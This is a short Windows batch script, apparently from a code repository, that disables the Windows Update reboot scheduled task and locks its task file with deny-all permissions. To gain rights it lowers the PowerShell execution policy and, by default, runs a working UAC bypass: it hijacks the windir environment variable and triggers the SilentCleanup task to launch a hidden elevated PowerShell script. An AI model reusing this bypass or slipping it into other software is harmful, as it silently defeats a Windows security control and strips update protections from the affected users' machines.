33 lines
1.4 KiB
Batchfile
33 lines
1.4 KiB
Batchfile
|
@echo off
|
||
|
set debug=0
|
||
|
|
||
|
set ps_reg="HKCU\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell"
|
||
|
|
||
|
rem check if the key already exists.
|
||
|
reg query %ps_reg% /v ExecutionPolicy >nul 2>&1
|
||
|
if NOT %errorLevel% == 0 (
|
||
|
rem set it just high enough so we can run our script.
|
||
|
reg add %ps_reg% /t REG_SZ /v ExecutionPolicy /d RemoteSigned
|
||
|
)
|
||
|
|
||
|
rem check if we're at least running as an admin.
|
||
|
net session >nul 2>&1
|
||
|
if NOT %errorLevel% == 0 (
|
||
|
rem re-run this script as system.
|
||
|
rem that's more than administrator, but less than trusted installer.
|
||
|
if "%debug%"=="1" (
|
||
|
powershell -Command "Start-Process powershell {%~dp0\elevate.ps1 %0} -Verb RunAs"
|
||
|
) else (
|
||
|
rem this version bypasses UAC. please refer to the following post:
|
||
|
rem https://tyranidslair.blogspot.ca/2017/05/exploiting-environment-variables-in.html
|
||
|
reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && powershell -WindowStyle Hidden -NonInteractive %~dp0\elevate.ps1 %0 && REM "
|
||
|
)
|
||
|
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
|
||
|
exit
|
||
|
)
|
||
|
|
||
|
schtasks /change /tn \Microsoft\Windows\UpdateOrchestrator\Reboot /DISABLE
|
||
|
icacls "%WINDIR%\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot" /inheritance:r /deny "Everyone:F" /deny "SYSTEM:F" /deny "Local Service:F" /deny "Administrators:F"
|
||
|
if "%debug%"=="1" ( pause )
|
||
|
exit
|